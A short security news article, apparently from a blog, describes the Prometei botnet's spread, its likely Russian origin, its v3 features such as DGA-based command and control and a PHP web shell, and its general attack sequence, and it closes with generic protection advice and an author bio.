The digital world is constantly evolving, and unfortunately, so are the cyber threats that come with it. One such threat is the Prometei botnet malware, which has been on the rise since November 2022.
This modular botnet is equipped with a vast array of components, which it uses to infect systems worldwide and harvest credentials and mine cryptocurrency. In this article, we’ll explore the latest developments of this malware.
Opportunistic Infections Across the Globe
Prometei has infected over 10,000 systems worldwide, with a majority of the victims reported in Brazil, Indonesia, and Turkey. Its infections are both geographically indiscriminate and opportunistic, as it targets vulnerable systems with its sophisticated proliferation methods.
Avoiding Russia: Clues to its Origin?
Interestingly, Prometei avoids attacking systems in Russia, which suggests that the threat actors behind the operation may be based in the country. This modular botnet is known for exploiting the ProxyLogon Microsoft Exchange Server flaws, among other vulnerabilities.
Sophisticated Malware With Advanced Features
Prometei is a cross-platform botnet with financial motivations, and it leverages its pool of infected hosts to mine cryptocurrency and harvest credentials. The latest variant of Prometei, known as v3, features improved capabilities that challenge forensic analysis and burrow deeper into victim machines.
Attack Sequence: Download, Retrieve, Spread
The Prometei attack sequence involves executing a PowerShell command to download the malware from a remote server.
Its main module then retrieves the actual crypto-mining payload and other auxiliary components on the system. Some of these support modules function as spreader programs, which propagate the malware through Remote Desktop Protocol (RDP), Secure Shell (SSH), and Server Message Block (SMB).
Advanced Features and Self-Update Mechanism
Prometei v3 uses a domain generation algorithm (DGA) to build its command-and-control (C2) infrastructure. It also has a self-update mechanism and an expanded set of commands to harvest sensitive data and commandeer the host. Finally, the malware deploys an Apache web server that’s bundled with a PHP-based web shell, which can execute Base64-encoded commands and carry out file uploads.
Continuously Evolving Threat
As threat researchers have previously asserted, Prometei’s operators are continuously updating the botnet and adding functionality. With each new variant, Prometei becomes more sophisticated, making it harder to detect and remove.
To protect your system, it’s crucial to stay vigilant and employ cybersecurity measures such as keeping your software updated and avoiding suspicious emails and downloads.
Dimitris is an Information Technology and Cybersecurity professional with more than 20 years of experience in designing, building and maintaining efficient and secure IT infrastructures.
Among others, he is a certified: CISSP, CISA, CISM, ITIL, COBIT and PRINCE2, but his wide set of knowledge and technical management capabilities go beyond these certifications. He likes acquiring new skills on penetration testing, cloud technologies, virtualization, network security, IoT and many more.